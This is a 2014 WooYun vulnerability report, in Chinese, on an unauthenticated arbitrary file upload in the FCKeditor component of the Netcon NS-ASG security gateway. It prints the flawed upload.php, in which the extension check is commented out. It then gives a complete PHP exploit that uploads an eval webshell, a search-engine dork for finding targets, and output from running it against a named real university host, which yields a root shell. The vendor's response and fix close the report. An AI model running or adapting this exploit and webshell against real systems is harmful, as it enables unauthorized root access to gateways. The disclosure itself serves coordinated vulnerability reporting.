当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-058902

漏洞标题:网康 NS-ASG 应用安全网关所有版本getshell

相关厂商:网康科技

漏洞作者: 狗狗侠

提交时间:2014-04-29 17:24

修复时间:2014-07-28 17:26

公开时间:2014-07-28 17:26

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-29: 细节已通知厂商并且等待厂商处理中
2014-05-01: 厂商已经确认,细节仅向厂商公开
2014-06-25: 细节向核心白帽子及相关领域专家公开
2014-07-05: 细节向普通白帽子公开
2014-07-15: 细节向实习白帽子公开
2014-07-28: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

第二弹了。。。。剑总,疯狗叔叔...求给力

详细说明:

无需登录,直接getshell。。。。太爽了...
https://目标域名/admin/fckeditor/_whatsnew.html
版本Version 2.4.3
ps (乌云好像传不了图片了?)
fckeditor在此版本下,可以任意上传文件,直接造成代码执行,我已经写好exp了
漏洞点在/admin/fckeditor/editor/filemanager/upload/php/upload.php?type=Media

require('config.php') ;
require('util.php') ;
// This is the function that sends the results of the uploading process.
function SendResults( $errorNumber, $fileUrl = '', $fileName = '', $customMsg = '' )
{
	echo '<script type="text/javascript">' ;
	echo 'window.parent.OnUploadCompleted(' . $errorNumber . ',"' . str_replace( '"', '\\"', $fileUrl ) . '","' . str_replace( '"', '\\"', $fileName ) . '", "' . str_replace( '"', '\\"', $customMsg ) . '") ;' ;
	echo '</script>' ;
	exit ;
}
// Check if this uploader has been enabled.
if ( !$Config['Enabled'] )
	SendResults( '1', '', '', 'This file uploader is disabled. Please check the "editor/filemanager/upload/php/config.php" file' ) ;
// Check if the file has been correctly uploaded.
if ( !isset( $_FILES['NewFile'] ) || is_null( $_FILES['NewFile']['tmp_name'] ) || $_FILES['NewFile']['name'] == '' )
	SendResults( '202' ) ;
// Get the posted file.
$oFile = $_FILES['NewFile'] ;
// Get the uploaded file name extension.
$sFileName = $oFile['name'] ;
// Replace dots in the name with underscores (only one dot can be there... security issue).
//if ( $Config['ForceSingleExtension'] ) //change by linyh
//	$sFileName = preg_replace( '/\\.(?![^.]*$)/', '_', $sFileName ) ;
$sOriginalFileName = $sFileName ;
// Get the extension.
$sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
$sExtension = strtolower( $sExtension ) ;
// The the file type (from the QueryString, by default 'File').
$sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
// Check if it is an allowed type.
if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
    SendResults( 1, '', '', 'Invalid type specified' ) ;
// Get the allowed and denied extensions arrays.
$arAllowed	= $Config['AllowedExtensions'][$sType] ;
$arDenied	= $Config['DeniedExtensions'][$sType] ;
// Check if it is an allowed extension.
if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
	SendResults( '202' ) ;
$sErrorNumber	= '0' ;
$sFileUrl		= '' ;
// Initializes the counter used to rename the file, if another one with the same name already exists.
$iCounter = 0 ;
// Get the target directory.
if ( isset( $Config['UserFilesAbsolutePath'] ) && strlen( $Config['UserFilesAbsolutePath'] ) > 0 )
	$sServerDir = $Config['UserFilesAbsolutePath'] ;
else
	$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
exec("sudo chmod -R 777 ".$sServerDir);
$sRootPath = $sServerDir;
if ( $Config['UseFileType'] )
	$sServerDir .= strtolower($sType) . '/' ;
//check for the directory before uploading the file
if(!is_dir($sServerDir))
{
    mkdir($sServerDir);
} 
while ( true )
{
	// Compose the file path.
	$sFilePath = $sServerDir . $sFileName ;
	// If a file with that name already exists.
	if ( is_file( $sFilePath ) )
	{
		$iCounter++ ;
		$sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
		$sErrorNumber = '201' ;
	}
	else
	{
		move_uploaded_file( $oFile['tmp_name'],$sFilePath ) ;
		if ( is_file( $sFilePath ) )
		{
			$oldumask = umask(0) ;
			chmod( $sFilePath, 0777 ) ;
			umask( $oldumask ) ;
		}
		if ( $Config['UseFileType'] )
			$sFileUrl = $Config["UserFilesPath"] . strtolower($sType) . '/' . $sFileName ;
		else
			$sFileUrl = $Config["UserFilesPath"] . $sFileName ;
		break ;
	}
}


自己分析吧! <2.4.3都有此问题了
我已经写好exp了。。。
可以批量拿网康应用网关的shell了,都是root。。。

<?php
print_r('
      +--------------------------------------------------------------+
                  NS-ASG Getshell  Exploit
      +--------------------------------------------------------------+
');
if ($argc < 2) {
      print_r('
      +--------------------------------------------------------------+
                  Example:
                  php '.$argv[0].' localhost
      +--------------------------------------------------------------+
      ');
      exit;
}
$host = $argv[1];
$file = 'index.php';
$path = "/admin/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media";
$url = 'https://'.$host.$path;
$fp = fopen("$file","w") or die('can not write');
fwrite($fp,"<?php phpinfo();eval(\$_POST[cmd]);?>");
fclose($fp);
$data = array('NewFile'=>'@'. dirname(__FILE__)."/$file");
	$curl = curl_init(); 
	curl_setopt ( $curl, CURLOPT_URL, $url ); // 
	curl_setopt ( $curl, CURLOPT_SSL_VERIFYPEER, 0 ); 
	curl_setopt ( $curl, CURLOPT_SSL_VERIFYHOST, 0 ); 
	curl_setopt ( $curl, CURLOPT_USERAGENT, "Mozilla/4.0" ); 
	@curl_setopt ( $curl, CURLOPT_FOLLOWLOCATION, 1 ); 
	curl_setopt ( $curl, CURLOPT_AUTOREFERER, 1 ); 
	curl_setopt ( $curl, CURLOPT_POST, 1 ); 
	curl_setopt ( $curl, CURLOPT_POSTFIELDS, $data ); 
	
	curl_setopt ( $curl, CURLOPT_TIMEOUT, 120 ); 
	curl_setopt ( $curl, CURLOPT_HEADER, 0 ); 
	curl_setopt ( $curl, CURLOPT_RETURNTRANSFER, 1 );
	$tmpInfo = curl_exec ( $curl ); 
	if (curl_errno ( $curl )) {
		echo 'Errno' . curl_error ( $curl );
	}
	curl_close ( $curl );
    //echo $tmpInfo;	
    preg_match('/201,\"(.*)\",\"/iU',$tmpInfo,$matchs);
	$url = 'https://'.$host.$matchs[1];
	print 'Shell: '.$url.'   password: cmd';


谷歌稍微找下吧 intitle:网康 NS-ASG 应用安全网关
G:\wamp\php>php wk.php vpn.lib.tju.edu.cn

+--------------------------------------------------------------+
NS-ASG Getshell Exploit
+--------------------------------------------------------------+
Shell: https://vpn.lib.tju.edu.cn/vpnweb/userfiles/media/index(3).php password
: cmd
都是root 。。

漏洞证明:

[/Isc/third-party/httpd/htdocs/vpnweb/userfiles/media/]$ ls -l
total 16
-rwxr-xr-x 1 root daemon 36 Apr 29 02:21 2.php
-rwxr-xr-x 1 root daemon 36 Apr 29 15:27 35.php
-rwxr-xr-x 1 root daemon 36 Apr 29 15:30 36.php
-rwxr-xr-x 1 root daemon 36 Apr 29 16:50 index.php
[/Isc/third-party/httpd/htdocs/vpnweb/userfiles/media/]$ whoami
root
[/Isc/third-party/httpd/htdocs/vpnweb/userfiles/media/]$

修复方案:

修复修复。。。准备再来一蛋

版权声明:转载请注明来源 狗狗侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-05-01 22:01

厂商回复:

4月29日,网康收到CNVD漏洞细节通知,迅速启动并同时展开了以下工作:
1.进一步验证漏洞细节,目前已确认所曝漏洞确实存在于ASG产品;
2.对全线产品进行安全自查,重点确认ASG产品是否仍存其它未知漏洞,并验证类似漏洞是否同存于其它产品线,截至目前,自查工作仍在进行中,全线产品暂未发现新的漏洞;
3.开发用于漏洞修补的更新程序,将尽快发布应急补丁包,介时用户可通过操作设备管理界面直接安装该更新程序以对所曝漏洞进行应急性修补;
4.售后服务部通过内部CRM系统导出全部ASG用户名单,并开始逐一联系用户通报漏洞情况,补丁包发布后,将再次逐一通知所有用户及时安装更新,此项工作预计3工作日内完成;
5.为避免统计疏漏,工程部于4月30日16:00向CNVD共享了在线ASG设备的辨识方法,将配合CNVD共同开展在线设备的主动探测工作,一旦发现未更新补丁的在线设备,将联系并协助用户及时更新,此项工作预计10工作日内完成;
6.将尽快向社会开放漏洞提交邮箱,接受第三方机构、白帽子及其它组织、个人向网康提交产品漏洞,向所有帮助网康产品进步的组织和人士表示感谢。

最新状态:

2014-07-17:已随版本更新解决